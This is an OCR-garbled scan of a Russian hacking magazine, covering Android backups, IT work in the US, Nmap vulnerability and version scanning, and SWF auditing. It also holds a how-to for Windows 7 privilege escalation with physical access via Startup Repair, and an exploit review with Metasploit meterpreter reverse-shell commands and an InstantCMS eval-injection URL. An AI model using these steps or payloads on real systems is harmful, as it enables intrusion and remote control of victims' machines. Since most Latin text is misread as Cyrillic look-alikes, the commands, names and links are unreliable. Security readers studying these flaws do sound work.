просмотреть бэкап в приложении ЫапсІгоісІ Мападег. 

Последнее, в свою очередь, представляет собой инстру- 
мент управления имеющимися резервными копиями, просмо- 
тра их содержимого, восстановления, а также выборочного 
восстановления приложений, настроек, текстовых сообщений, 
логов разговоров, паролей от точек доступа ѴѴі-Рі, рабочего 
стола, а также истории и паролей браузера. Все инструменты 
восстановления располагаются на вкладке «Восстановить дан- 
ные», и какие-либо пояснения по работе с приложением здесь 
не требуются. Все русифицировано и понятно даже ребенку. 

ВЫВОДЫ 

Сегодня процесс прошивки и кастомизации смартфона под 
управлением АпсІгоісІ — это уже не тот зубодробительный квест, 
каким он был во времена первых версий АпсІгоісІ. Как ты смог 
заметить, все делается очень просто, без чтения длинных ма- 
нуалов и поиска совместимых прошивок. Но даже в том случае, 
если что-то пойдет не так, если ты окажешься столь невезучим, 
что запорешь не только установленный АпсІгоісІ, но и консоль 
восстановления, Ьооі-сектор все равно останется на месте 
и ты сможешь вернуть свой смартфон к жизни, подключив его 
к компу и воспользовавшись фирменными инструментами про- 
шивки от производителя. □С 
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ШТАТЫ 
НА РАБОТУ 

«Быть в теме» и не знать английский язык — ситуация почти нереальная. На ан- 
глийском проводятся самые крутые конференции (как недавние ВІаск ИаХ 
и ОЕР СОІЧ). Английский — язык для публикации научных статей и книг. На ан- 
глийском разговаривают специалисты из разных стран, если им предстоит со- 
трудничать или нужно обменяться опытом. И уж точно английский необходим, 
если ты хочешь поработать в самом центре событий мира ІТ — в Силиконовой 
долине. И именно об этом я хочу рассказать. 




БЕЗ АНГЛ ИЙСКОГО ПУТЬ ЗАКРЫТ 

Чтобы всего лишь попасть в список соискателей 
на более-менее престижную вакансию в США, 
простому айтишнику необходимо не только до- 
казать свою квалификацию (и подтвердить ее 
международными сертификатами по выбранной 
специализации — МісгозоТІ:, Сізсо, Огасіе, І_РІ 
и так далее), но и продемонстрировать отличный 
английский. 

Кандидаты с недостаточным уровнем языка, 
скорее всего, столкнутся с серьезным разочаро- 
ванием. Поскольку список соискателей на одну 
позицию в ІТ-сфере огромен, всегда найдется 
не менее квалифицированный специалист с раз- 
говорным английским — сужу по собственному 
опыту работы в нью-йоркской ІТ-компании. 

ВИЗА 

Помимо «подтягивания» уровня английского, 
потенциальному мигранту предстоит получить 
разрешение на работу в США. Наиболее распро- 
страненный вариант — получить визу категории 
Н1В, предназначенную для специалистов, кото- 
рых компания сама приглашает на работу. Чаще 
всего по этой визе въезжают программисты, 
сисадмины, специалисты по ИБ. 

Эта виза оформляется за счет работодателя, 
а процесс оформления занимает до полугода. 
Если на данные визы закончится квота, соис- 



кателю придется ждать следующего года. Надо 
отметить, что одним из этапов получения визы 
Н1В является собеседование по телефону — 
оно необходимо для определения уровня языка. 
В общем, способ долгий, хлопотный и требую- 
щий серьезного профессионального развития, 
но при этом наиболее надежный и реалистичный. 

Как вариант, можно перевестись из россий- 
ского в американское подразделение между- 
народной корпорации, получить приглашение 
от близкого родственника — гражданина США, 
выиграть грин-карту в ежегодной лотерее, всту- 
пить в брак или даже попросить политического 
убежища. 

ЗАРПЛАТЫ 

Допустим, ты все-таки нашел способ попасть 
в США. На какие же зарплаты можно рассчиты- 
вать? 

Одна из самых «выгодных» сфер в ІТ — ин- 
формационная безопасность. В частности, наи- 
большим спросом в США пользуются инженеры 
по ИБ и аналитики систем безопасности. Сред- 
няя зарплата в сфере ИБ в 2013 году составила 
95 000 долларов в год для рядовых сотрудников 
и 120 000 — для руководителей. 

Для сравнения: средняя зарплата во всей 
ІТ-индустрии США составляет от 65 000 долла- 
ров для рядового сотрудника, а общая средняя 



зарплата в Америке не превышает 50 000. Здесь 
уместно вспомнить, что средний оклад програм- 
миста в Москве — около 75 000 рублей в месяц, 
то есть по текущему курсу 27 000 долларов в год. 

Впрочем, не все так радужно — в США при- 
нято указывать зарплату до вычета налогов. Сум- 
марный уровень налоговых выплат составляет 
от 25% и сильно разнится от штата к штату, то 
есть 100 000 заработной платы означают около 
75 000 долларов реального дохода. 

Кроме того, при переезде тебе предло- 
жат зарплату ниже среднерыночной. Возмож- 
ность получить высококлассного специалиста 
за скромные деньги — главная причина, по ко- 
торой кадровые агентства активно ищут сотруд- 
ников за пределами США. И даже за эти деньги 
тебе придется жестко конкурировать с трудо- 
любивыми и невзыскательными соискателями 
из Китая. 

ВСЕ РАВНО ПРОФИТ 

В общем, если после получения всех сертифи- 
катов, освоения английского на разговорном 
уровне и рассылки резюме по зарубежным ра- 
ботодателям ты так и не получишь заветное при- 
глашение, не опускай руки. С такими знаниями 
ты всегда сможешь как минимум удвоить свой 
доход и в нашей стране, при этом развивая рос- 
сийский ІТ-рынок. ѴѴіп-ѵѵіп. 
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АНАСТАСИЯ ЛОМАЕВА 

Руководитель отдела по работе с персоналом компании ЕЗЕТ 

• В 1999 году Анастасия Ломаева окончила международную школу при ООН в Нью-Йорке. В 2003 году по- 
лучила степень бакалавра по специальностям «Международный бизнес» и «НВ-менеджмент» в универ- 
ситете Фордхэм. 

• После окончания университета Анастасия устроилась специалистом по работе с персоналом в консалтин- 
говой ІТ-компании Ые1:23 на Уолл-Стрит. 

• В 2006 году переехала в Россию для получения степени МВА по программе ОгепоЫе ОгасІиаТе ЗсИооІ оТ 
Визіпезз и Академии народного хозяйства при Правительстве РФ. 

• В 2011 году Анастасия присоединилась к команде ЕЗЕТ Риззіа. 
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НАЙТИ ИЗВЕСТНЫЕ УЯЗВИМОСТИ ДЛЯ СЕРВИСОВ, ОПРЕДЕЛЕННЫХ ИМАР 



РЕШЕНИЕ 

ІМплар стала одной из главных тулз при пентесте, особенно когда дело касает- 
ся «первых шагов» — сбора информации о цели. Сканирование портов, опре- 
деление сервисов по их отпечаткам — все это активно используется. А сам 
движок ІМплар внедрен во многих других продуктах, в том числе и в платных. 

Есть еще один важный момент: после внедрения в ІМплар движка для вы- 
полнения ІМЗЕ-скриптов сообществом было разработано огромное количе- 
ство скриптов с самым разным функционалом. В результате ІМплар из про- 
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Скрипт для поиска известных уязвимостей для N тар 



сто сканера портов превратился в сканер уязвимостей (как-то странно это 
по-русски звучит :)). Напомню, ІМ5Е — это такие скрипты на языке І_иа, ра- 
ботающие с библиотеками, описывающие разнообразные протоколы. С их 
помощью можно добавлять к сканеру различный функционал — от перебо- 
ра учеток к ЗІММР до эксплуатации уязвимостей в СоІсІРизіоп. 

Так вот, не так давно компания 5сір АС ( ѵѵѵѵѵу.зсір.сіл ) выложила еще 
один прикольный ІМЗЕ-скрипт — ѵиізсап. Суть его до невероятности проста. 
При сканировании ІМплар с определением софта на сервисах скрипт берет 
название ПО (если оно было определено, конечно) и прогоняет его по базам 
уязвимостей: СѴЕ, ОЗѴВР, с ЗесигііуРосиз и ЗесигііуТгаскег, а также по некое- 
му обобщению предыдущих — зсірѵиІсІЬ. 

Поиск происходит локально (каждая база лежит в отдельном СѴЗ-файле). 
Таким образом, мы можем узнать, есть ли в данном сервисе какие-то паблик- 
уязвимости. 

Пример на рисунке. Как можно заметить, там есть парочка ТаІзе-розШѵе. 
Какая-то Могіііа. . . Это все следствие того, что скрипт производит просто по- 
иск подстроки в базе. Согласен — дубово :). 

С другой стороны, не раз сталкивался с ситуацией, когда по-быстренькому 
сканировалась какая-то сеть с кучей странных сервисов. И хорошо было бы 
сразу выискать самые лакомые кусочки. 

Для того чтобы заставить скрипт работать, надо его скачать с базами от- 
сюда: зсір.с!л/еп/?ІаЬз. 201 30625 . ѵиізсап. пзе кинуть в зсгіріз папки ІМплар, 
а базы — в зсгіріз/ѵиізсап. Запускается либо обычным образом для ІМ8Е- 
скриптов, либо в комплекте с -зС (так как относится к сІеТаиІѢ и заіе модулям). 
Одна личная рекомендация — лучше выбирать конкретную базу (зсірѵиІсІЬ), 
иначе листинг может быть ооооочень большим. 

птар -бѴ --зсгір1:=ѵиІ5сап. пзе --зсгірІі-аг^Б <-■ 
ѵи1зсапсІЬ=5сірѵи1сІЬ.с5ѵ -р4б5 •Еагдеі _ір 
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КОРРЕКТНО ОПРЕДЕЛИТЬ ВЕРСИИ ПО, ИСПОЛЬЗУЯ ШАР 



РЕШЕНИЕ 

Описывая решение предыдущей задачки, я вспомнил еще один вопрос, 
который меня когда-то интересовал и которым я хотел поделиться с тобой. 
А как же на деле ІМтар определяет версии ПО на портах? В смысле, основ- 
ная концепция — посылать разные запросы и сверять ответы с имеющейся 
базой — вполне понятна и логична. Но вот когда сталкиваешься с реальны- 
ми сканами и видишь что-то типа «ІсрѵѵгарресІ» или «Ир?», что с этим делать? 
Сюда же можно добавить и случающиеся «пропуски» (Таізе педайѵе) каких- 
нибудь сервисов... На самом деле про эту тему можно было бы написать це- 
лую статью, но я постараюсь описать основные процессы и важные факты, 
которые помогут «приручить» ІМплар. 

Итак, все начинается со сканирования портов. Порты отсканировались, 
и только на тех, что получили статус ореп или ореп |ТМ1;егесІ, будут опреде- 
ляться сервисы (если был указан параметр -зѴ или аналогичный). В случае 
если был статус ореп | ТіІѣегесІ и сервис был определен, то статус меняется 
на ореп. Важно также, что процесс определения сервисов происходит па- 
раллельно для различных портов. 

Чтобы понимать алгоритм определения сервиса, нам надо познакомить- 
ся с двумя файлами, поставляемыми с Ытар’ом, — птар-зегѵісез и птар- 
зегѵісе-ргоЬез. Первый — это просто соотношение типов сервисов (РТР, 
НТТР, ЭМЗ) и портов. ѴѴеІІ кпоѵѵп или типовые, так сказать. Большая часть 
взята из ІАЫА (1024 первых порта). Данные из этого файла используются 
(частично) для третьего столбца (Зегѵісе). 

Здесь же кроется и ответ на одну из распространенных проблем. Если 
в выводе Ытар’а указывается сервис со знаком вопроса (ЫТр?, Нр?), то зна- 
чит, что ІЧплар даже не понял, какой там используется протокол/сервис. 
Это просто общее указание, что обычно там бывает такой-то сервис. Если 
же без знака вопроса, но без версии ПО, то, значит, не было информации 
о версии, но тип сервиса правильный (хотя доверять тут не следует, он мог 
и ошибиться). 

Дальше — второй файл. В нем описаны различные пробы (РгоЬез), кото- 
рые использует ІЧтар для определения версий ПО на портах. По сути, это 
просто некая последовательность данных, которые отправятся на сервис, 
а также набор гедехр’ов — правил к ним для того, чтобы парсить ответы. 
Если правило сработало, то версия, значит, определилась (и дальнейшее 
определение сервиса прекращается). 

Первая и основная проба (для протокола ТОР) — І\ІІІІ_І_. Она указывает 
то, что Ыплар подключается к порту и ничего не посылает, а ждет 6 секунд 
ответных данных. Большинство сервисов, в особенности олдскульных (РТР, 
ЗМТР, 88Н), первыми посылают данные клиенту — некое приветствие. Во 
многом поэтому у N11 1_І_-пробы больше всего различных правил (регекспов). 
Подключились, подождали — получили данные. Если ответа никакого нет, 
используется следующая проба — СепепсЫпез (\г\п\г\п). В данном случае 
данные уже отправляются на сервер и правила сверяются с полученным 
ответом. Важно еще отметить, что для ІЮР-скана отсутствует І\ИІІ_І_-проба 
(из-за специфики протокола). 

Еще раз подчеркну, что к каждой пробе может быть любое количество 
правил. Вот пара примеров: 
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Как видишь, все просто. Сами правила (плаІюЬ) определяют сервис и стан- 
дартный гедехр (как в РегІ), с помощью которого мы можем где надо вытащить 
версию, например. 

Но это все первая и простая часть. Далее чуть больше тонкостей. 
Во-первых, кроме простых правил, есть еще и «мягкие». Они начинают- 
ся с зоНплаІсЬ и подтверждают правильный выбор протокола. То есть 
как только срабатывает мягкое правило, в дальнейшем применяются толь- 
ко пробы для этого сервиса (протокола). Например, мягкое правило (какое 
словосочетание-то) для РОРЗ. 

зо-РТтаТсЬ рорЗ т | Л \+0К -\[\ (\(\) ! . /+: о&Лѵі ]+\г\п$ | 

При срабатывании этого правила не определяется версия ПО (потому 
они мягкие), но ІЧтар теперь не будет слать пробы, которые точно не по- 
дойдут (СЕТ / НТТР/1 . 1 , например), что избавит нас от мусорного трафика. 
А будет использовать только подходящие для сервиса (НеІр\г\п, например). 

Дальше несколько важных полей в файле птар-зегѵісе-ргоЬез. Для каж- 
дой пробы (кроме І\ІІІІ_І_) указывается порт, на котором эта проба чаще всего 
срабатывает (точнее, где обычно висит сервис), а также «редкость» (гапіу) 
этой пробы. Чем выше значение, тем оно реже. Возможны значения от 1 
до 9. Что еще важнее — значение по умолчанию 7, то есть ряд проб не ис- 
пользуются достаточно часто. 

РгоЬе ТСР Не 11 о д |ЕН1.0\г\п| 

рогіз 25.587.3025 

гагіТѵ 8 

Так, ну и последняя опция, которая, правда, скорее важна, если ты захо- 
чешь добавлять свои пробы, — ТаІІЬаск. Она связывает различные правила 
проб между собой, чтобы не требовалось их повторять. По умолчанию у всех 
проб стоит привязка к І\ИІІ_І_-пробе. Таким образом, когда посылается какая- 
то проба, ответ сначала проверяется правилами от самой пробы, а потом 
правилами от МІІІ_І_. С помощью опции ТаІІЬаск ты можешь сделать ссылку 
на другую пробу, чьи правила будут применены раньше І\ІІЛ_І_. 

И еще важный момент про пробы. Есть специальная проба для опреде- 
ления поддержки 35І_-сервисом. И если она проходит, то все пробы повто- 
ряются (включая ІЧІІЩ, но уже в обертке из ЗЗЬподключения. К тому же 
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Определение версии ПО в Ыгпар 
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в выводе в поле Зегѵісе добавляется указание о поддержке 55І_ (типа ззі/ 
рорЗ). Кстати, 55І_ — это как раз то, что определяется верно всегда. 

Итак, мы разобрали вводную часть и теперь можем корректно осознать, 
какие же пробы будут использованы. Во-первых, ІМтар смотрит на порт, 
который тестируется, и выбирает все пробы, которые «часто» появляются 
на этом порту (значение рогіз из птар-зегѵісе-ргоЬез). Во-вторых, ІЧплар 
смотрит указанную при сканировании «интенсивность» детекта (оно же поле 
гагііу). Будут использованы только те пробы, чье значение меньше указан- 
ного или равно ему. То есть ЕНІ_0 из последнего примера будет использо- 
вана, несмотря на ее редкость, которая больше значения по умолчанию (7), 
но только на определенных портах (ЗМТР’шные порты — 25, 587, 3025). Те- 
перь, я думаю, кое-что стало понятно. И надеюсь, я нигде не напутал сильно. 

Несколько общих практических советов. Для начала надо вспомнить, 
что, имея дело с ІМтар’ом, мы всегда выбираем некий компромисс между 
скоростью и глубиной. Потому даже некоторые веб-серверы на нестан- 
дартных портах иногда могут скрыться от сканирования по умолчанию, так 
как не все пробы используются. С другой стороны, если мы укажем пара- 
метр --ѵегзіоп-ІідНІ:, который устанавливает интенсивность в значение 2, 
это даст нам, как ни странно, быстрые значения с достаточно хорошим по- 
крытием. 



Если же говорить про проблемные порты, где ответ ІМтар невнятен, 
то как минимум стоит применить --ѵегзіоп-аІІ, указывающий использовать 
все пробы. Также сам ІМплар, в случае, когда данные от сервиса получе- 
ны, а правила ни одни не подошли, выводит значения при сканировании. 
Это тоже хорошее место для анализа. При иных странностях (и если есть 
время) стоит использовать --ѵегзіоп-ігасе, который укажет нам, когда и ка- 
кое правило срабатывает (помогает, когда определен только тип сервиса, 
а версии нет). 

А, ну и вопрос, часто напрягающий, — видеть ІсрѵѵгарресІ в графе Ѵегзіоп. 
Вообще, вики говорит, что ІсрѵѵгарресІ — это некая тулза под *піх, которая 
позволяет АСІ_ на подключения. При этом проверка происходит уже по- 
сле установки подключения, а потому порт открыт. Я лично их в реально- 
сти не видел, а вот с ІсрѵѵгарресІ сталкиваюсь систематически. В общем, 
ІсрѵѵгарресІ — это спецправило ІМтар, и срабатывает оно тогда, когда сервер 
обрывает подключение до того, как данные были отправлены. Неуверен, но, 
возможно, здесь может быть Таізе-педаііѵе от ІМтар, из-за того что сервер 
разрывает подключение еще до окончания ожидания ГМІІІ_І_-пробы в 6 се- 
кунд. А другие пробы и не запускаются. 

Надеюсь, что получилось понятно описать. Если есть вопросы, докумен- 
тация в помощь ( аоо.аІ/а44Ци ). 



АВТОМАТИЗИРОВАТЬ ПОИСК УЯЗВИМОСТЕЙ ПАЗН-РОЛИКОВ 



РЕШЕНИЕ 

Хе-хей, в прошлый раз мы с тобой познакомились с возможной «небезопас- 
ностью» флеш-роликов. Чем больше фишек, тем и проблем с безопасностью 
больше. А флеш — он тот еще толстяк. Хотя надо сказать, что АбоЬе подкру- 
тила гайки и старые векторы атак уже не всегда работают в новых плеерах 
и с учетом функционала АсІіопЗсгірІ; 3. Но презентации последних лет двух 
показывают: те же ХЗЗ через флеш-ролики — это распространенная вещь, 
даже на защищенных сайтах. Вообще, я планировал расписать тему со спе- 
цифичными именно для флеша багами (а не обычные ХЗЗ), но хороших (ды- 
рявых) примеров пока не нашел. Так что сегодня мы возьмемся с другого 
конца — с метода поиска уязвимостей в роликах и автоматизации этого про- 
цесса. 

Итак, поиск. Первый метод — который мы обсуждать не будем :) — это 
фаззинг. Он вообще применим к роликам. Но мне кажется, что этим если 
и заниматься, то только как часть работы по сканированию веб-приложения, 



где ролик используется. В смысле, здесь нужны другие тулзы, как, например, 
зѵѵИпѵезйдаІюг ( аоо.а1/Афс19 ). но процесс тот же. И, имхо, много не найдешь. 

Второй, более трудозатратный, основывается на том, что ЗѴѴР — это 
ролик, который скачивается и исполняется на клиентской машине, то есть 
у нас. К тому же он представляет собой байт-код, а потому хорошо деком- 
пилируется. Декомпиляторов много, в том числе бесплатных. Пару лет назад 
были проблемы с декомпилятором под АЗЗ, но все исправилось. Мне лично 
по душе ЗоІЫпкЗѴѴР Эесотрііег, хотя он и платный (есть триал). Все, что даль- 
ше требуется, — посмотреть, есть ли какие-то входные параметры, а также 
может ли их модификация к чему-то привести. Первая часть дела делается 
очень быстро, вторая же зависит от толщины и функциональности ролика. 
Но по опыту — занимательные вещи достаточно быстро раскапываются. Все 
дело в том, что большинство вообще не подозревают, что ролики могут нести 
угрозу для безопасности, то есть основная наша задача — понять функционал 
ролика. 





Декомпиляция в один клик 



Классические проверки на «безопасный» 5ѴѴР 
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Ну и конечно, указанные еще в прошлый раз — группа опасных функций. 
Их тоже надо поискать. А так как это, по сути, поиск по тексту, то и тулзы 
есть нам в помощь. Например, ЗеагсНЭіддіІу ( аоо.дІ/ВіСУг ). Это такой по- 
исковый комбайн, который изначально был нацелен на сбор информации 
из Соодіе и Віпд, но расширился и научился парсить метаинфу документов 
на приватную информацию (как тулза РОСА), искать по ЗНосІапНО, а также 
декомпилить ТІазІі-ролики и искать в них гедехр’ом опасные функции. Полу- 
чилось очень просто и лаконично: указываешь папку с роликами для анали- 



за и правила, по которым будет производиться поиск, и все — основные 
косяки уже видны. 

Вторым помощником может оказаться более специализированная тул- 
за от НР — ЗѴѴРЗсап ( аоо.аІ/бРАІР ). Это бесплатный декомпилятор для ЗѴѴР 
на А82, А83 с кучкой «мозгов». Указываешь ЗѴѴР’ ку, он ее подгружает и анали- 
зирует. По каждому найденному пункту он выводит описание «чем это плохо» 
и указывает место в исходниках, что очень полезно (хотя первый декомпиля- 
тор поюзабельней, имхо). Весь наборчик я приложу, так что попрактикуйся. 




ЗеагсПОіддііу что-то 
в 5ѴѴР 5 ках нашел . 
Осталось проверить 




\ѴАІШШС 



Вся иноформация 
предоставлена исключи- 
тельно в ознакомитель- 
ных целях. Ни редакция, 
ни автор не несут от- 
ветственности залюбой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



ПОДНЯТЬ ПРИВИЛЕГИИ В ѴѴІШѴѴ8 ПРИ ФИЗИЧЕСКОМ ДОСТУПЕ К ХОСТУ 



РЕШЕНИЕ 

Недавно в блоге ІпІеІСоплплз ( аоо.аІ/5Іа97 ) был опубликован прикольный 
метод поднятия привилегий в ОС ѴѴіпсІоѵѵз 7 в том случае, когда у нас име- 
ется физический доступ к компу. Такой трюк специально для инсайдеров. 

Конечно, имея физический доступ, сделать это достаточно просто, но, 
с другой стороны, на предприятиях с этим стараются бороться: опечатыва- 
ют корпуса техники, устанавливают пароль на БИОС и на локального админа 
в винде, отключают загрузку с внешних девайсов. И в такой ситуации возмож- 
ности пентестера значительно ограничены. 

Так вот, этот метод обходит все названные ограничения, да и вообще 
оставляет лишь небольшое количество следов после себя. Все потому, 
что основывается он на фиче самой винды — восстановлении после сбо- 
ев (Зузіеіті Весоѵегу). Сразу отмечу, что не стоит путать эту фишку с «без- 
опасным режимом» загрузки ОС (Заі’е тобе), так как у второй для доступа 
к ОС необходимо ввести пароль от админа. А вот у Зузіепл Весоѵегу такой 
проблемы нет. 

Кроме того, вызвать этот процесс очень просто. Необходимо некорректно 
вырубить винду — кнопкой «Безе!» или <С1тІ + АН + ЭеІ>. При загрузке систе- 
мы ОС поймет, что ее отключили неверно, и выведет на экран варианты за- 
грузки: 

• ЗіаП: ѴѴіпсІоѵѵз ІМогтаІІу; 

• І_аипсІл ЗІагіир Вераіг (гесоттепсіесі). 

Я думаю, каждый из нас видел этот экран хоть раз в жизни. 

Выбираем ЗіаПир Вераіг, и все! Дальше идут чистые СШ-хаки, для того 
чтобы добраться до файловой системы или консоли: 

1 . Ждем подгрузки Зузіепл Весоѵегу. 

2. На вопрос Везіюге уоиг сотріНег изіпд Зузіет Везіюге отвечаем «Нет». 



3. В появившемся окне об отправке сообщения об ошибке выбираем Ѵіеѵѵ 
ргоЫепл сіеіаііз. 

4. Кликаем на одну из ссылок, откроется, например, ІЧоІерасІ. 

5. Из блокнота уже нет никаких ограничений. Через окно открытия файлов 
уже можно запустить и консоль, и проводник, чтобы бороздить просторы 
файловой системы ОС. 

Вся хитрость метода в том, что в режиме Зузіепл Весоѵегу у пользовате- 
ля, во-первых, есть полный доступ к файловой системе ОС, во-вторых, от- 
сутствует запрос каких-либо учеток и, в-третьих, команды выполняются от ЫТ 
АІ)ТНОВІТУ\5У8ТЕМ. 

Что делать с доступом дальше? Зависит от ситуации. Можно, например, 
воспользоваться уже как-то описанным методом и поменять файл, отвеча- 
ющий за спецвозможности (который доступен еще до логина в систему) 
на стб.ехе. 

Что еще интересного? Да, стоит отметить, что Микрософт не считает тако- 
го плана баги за баги, так как здесь имеется потребность в физическом досту- 
пе. А потому данный метод будет долго и счастливо жить :). Небольшой минус 
метода в том, что информация о сбое системы сохранится в логах (хм, инте- 
ресно, а можно ее с нашими высокими привилегиями сразу же почистить?). 
Во-вторых, нельзя пользоваться сетью. 

И еще один важный момент, который описан в блоге. Данный метод оди- 
наково хорошо работает как против отдельных хостов, так и против ОС, кото- 
рые добавлены в домен. В общем, шикарно! 

На этой приятной ноте прекращаю поток мыслей. Надеюсь, было интерес- 
но :). Если есть пожелания по разделу Еазу Наск или жаждешь поресерчить — 
пиши на ящик. Всегда рад :). 

И успешных познаний нового! І]С 




Взлом 
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В этом месяце нас снова порадовали уязви- 
мостью в Заѵа, правда, не нулевого дня. Мно- 
жественные критические уязвимости были об- 
наружены в одном из флагманских продуктов 
ЗутаШвс — ѴѴеЬ Оаіеѵѵау. Но самое главное — 
стал доступен эксплойт для административной 
панели популярного банковского трояна СагЬегр. 



Борис Рютин, ЦОР (Езаде ІаЬ) 

сІикеЬагтап@хакер.щ . 

@с!икеЬагтап 



ОБЗОР . 
ЭКСПЛОИТОВ 



АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 



СОРЕІ. РОР ГЦЗІОЫ — 
ПЕРЕПОЛНЕНИЕ БУФЕРА 



СѴ55ѵ2: 

Дата релиза: 
Автор: 

СѴЕ: 



ІЧ/А 

8 июля 2013 года 
КаѵеРі СІіаеттадІіаті 
2013-3248 



СогеІ РЭР Ризіоп позволяет просматривать, редактировать, объединять 
и создавать РЭР-документы из оригинальных файлов более чем 100 различ- 
ных форматов, в том числе бос, ѴѴРЭ, 6РС, ТІРР, СЮР, ХРЗ, САР, босх и РРТХ. 
ХРЗ — это открытый графический формат фиксированной разметки на базе 
ХМІ_ от компании МісгозоТТ Как и босх, этот формат по своей сути является 
2ІР-архивом. 

Данная уязвимость проявляется при парсинге имен директорий, входя- 
щих в этот архив, что позволяет вызвать переполнение буфера при открытии 
пользователем специально созданного ХРЗ-файла. 

ЕХРДОІТ 

Существует модуль для Меіазріоіі:, который создает атакующий файл. 

тз-Р > изе ехрІоіІі/ыіпбоыз/ІіІе-РогтаІі/сопеІрб-Р -Ризіоп Ьо-Р 
ігіБ-Р ехріоііібсогеірб-р -Ризіоп Ьо-И > зеі: РАУІ.0АР ыіпбоы5Л-< 
те1:егрге1:ег/геѵег5е_1:ср 

тз-Р ехр!оі1=(соге1рб-Р -Ризіоп Ьо-И > зеі: 192.168.24.141 
тз-Р ехрІоіІіСсогеІрб-Р -Ризіоп Ьо-Р) > ехріоіі: 



Полученный файл может быть отправлен жертве. Энтузиасты же могут 
сами реализовать эксплойт на основе реального файла. Выше я упомянул, 
что ХРЗ-формат — это 2ІР-архив, то есть можно воспользоваться одним 
из множества архиваторов (для ѴѴіпбоѵѵз — 7гір) и самому перепаковать нуж- 
ный файл, добавив к нему полезную нагрузку. 

ТАПСЕТ8 

СогеІ РЭР Ризіоп версии 1 .11 и ниже. 

80ШТІ0Ы 

На момент публикации не было исправлений. 
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НЕБЕЗОПАСНЫЙ ВЫЗОВ МЕТОДА МА АРРІ.ЕТ 
РР0ѴЮЕРЗКЕІ.ЕТ0М 



СѴ88ѵ2: 


9.3 (АѴ:В/АС: М/Аи: N/0:0/1 :С/А:С) 


Дата релиза: 


18 июня 2013 года 


Автор: 


Абапл Соѵѵбіак 


СѴЕ: 


2013-2460 



И снова в нашем обзоре уязвимость в баѵа. Ошибка проявляется при обра- 
щении к методу іпѵоке() класса РгоѵісІегЗкеІеІюп. Атакующий может создать 
специальный веб-сайт, который выполнит произвольный код у пользовате- 
ля. Подобная уязвимость была найдена ( ЬіІ.Іѵ/13йсѵѵѴ8 ) этой же командой 
Зесигііу Ехріогайопз в прошлом году, поэтому автор уязвимости для успеш- 
ной атаки использует ту же конструкцию. Он запускает системные (запрещен- 
ные) команды через объект в поле ІоокирСІазз, ссылку на который получает 
через метод -РогМате, вызванный из уязвимого класса. 



ЕХРЮІТ 

Конечно же, для такой уязвимости существует Меіазріоіі-модуль для всех ОС: 

тз-Р > изе ехр!оі1і/ти11:і/Ьгоы5ег/^аѵа_^ге17_ргоѵісІег_5ке1е1:оп 
тз-Р ехрІоіІіПаѵа іге17 ргоѵісіег зкеіеііоп) > <-■ 

зеі: РАУШАР іаѵа/теііегргеііег/геѵегзе ііср 

тз-Р ехрІоіІіР^аѵа ^геІУ ргоѵісІег зкеІеІіоп 4 ) > зеі: 192.168.24.141 
тз-Р ехр1оі1:(іаѵа іге17 ргоѵісіег зкеіеііоп) > ехріоіі: 

Также есть исходники ( Ьі1.Іѵ/179Иізк ) эксплойта от автора исследования. 

ТАПСЕТ8 

баѵа 7 ирбаіе 21 и ниже. 

80ЮТІ0Ы 

Существует исправление от производителя. 

ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА 
В ІМЗТАЫТСМЗ 1.6 

СѴ88ѵ2: Ы/А 

Дата релиза: 26 июня 2013 года 

Автор: АкаЗІер 

СѴЕ: Ы/А 

Сегодня мы рассмотрим довольно популярную СМ3, которую особенно лю- 
бят использовать в качестве каких-либо порталов. Чаще всего это городские 
ресурсы или сайты по интересам (например, автомобильные). Ошибка за- 
ключается в недостаточной фильтрации полученных данных от пользователя, 
причем полученный параметр используется в функции еѵаі. 



і-р ($1оок == 'рІіпазе'Н 



Іаеаіпзі: 


. = ' \ . $аиегѵ. ' : 








еѵа1( ' зеагсіл 


1 ^сотропеп-Ь'Ііпк' ( . ' ( " ' .$а§аіпз1:. ' ' 


1 , 4-і 


" 1 .$1оок. ' " . 


" ' . $тобе. ' ");'’); 





Чтобы проверить, уязвима ли версия на сайте, обратимся по адресу 
со следующими параметрами: 



зііе. сот/іпбех.рНр?ѵіец=зеагсІі&диегу=4--< 

$ІесЬо рІіріп-РоО >&1оок=а11ыогсІ5 

В результате мы должны увидеть вывод нашей любимой функции 
рИрігѵРо( ). 

ЕХРЮІТ 

Эксплуатация возможна несколькими способами: 

• По аналогии с рИрігѵРо() передается любой нужный нам параметр. На- 
пример, функцию чтения файла и вывод, чтобы получить пароль к БД. 

• У автора уязвимости существует скрипт для программы Аиіоіі. Пример ра- 
боты такой программы можно увидеть на скриншоте. 

• Меіазріоіі-модуль. 




Пример работы эксплойта в ОС ѴУіпсІоѵѵз 



ТАНСЕТ8 

ІпзІапЮМЗ =< 1 .6. По словам автора, на просторах Сети он нашел тестовую 
версию 1 .7, которая также была уязвима. 

80ШТІ0Ы 

На момент публикации патча не было. Но можно сделать фильтрацию вручную, 
обернув полученный уязвимый параметр в функцию ІтІітІзресіаІсІіагзО. 



МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 
В ЗѴМАМТЕС ѴѴЕВ САТЕѴѴАѴ 5.1.0 



СѴ88ѵ2: 


Ы/А 


Дата релиза: 


27 июля 2013 года 


Автор: 


ѴѴоІТдапд ЕШпдег 


СѴЕ: 


2013-1616, 2013-4670, 2013-4671, 2013-4672 



Теперь рассмотрим корпоративное защитное решение от антивирусного 
производителя Зутапіес. Зутапіес ѴѴеЬ Саіеѵѵау защищает организации 
от многочисленных вредоносных программ и поддерживает развертывание 
в виде виртуального или физического устройства. Как пишет сама компания, 
продукт основан на ІпзідТіІ: — инновационной технологии собственной разра- 
ботки для фильтрации вредоносных программ с учетом репутации. В работе 
используется глобальная сеть из более чем 210 миллионов пользователей, 
чтобы выявлять новые угрозы еще до того, как они смогут нарушить работу 
организации. Теперь рассмотрим сами уязвимости: 

1 . Отраженная Х88 — позволяет эффективно перехватить сессию с соокіез 
администратора. 

2. Хранимая Х88 — позволяет неавторизованному пользователю вставить 
код скрипта в интерфейс администратора. Этот скрипт выполнится, 
как только администратор посетит свою панель. 

3. Инъекция системных команд — исследователи обнаружили многочис- 
ленные уязвимости, позволяющие вставить системные команды. Ав- 
торизованный пользователь может выполнить произвольные команды 
в ОС с правами системного пользователя арасНе. Это можно использо- 
вать для получения постоянного доступа к атакуемой системе (например, 
установка и запуска бэкдора), раскрытия всей сохраненной информации 
или перехвата сетевого трафика. 

4. Неправильная конфигурация безопасности — непривилегированные си- 
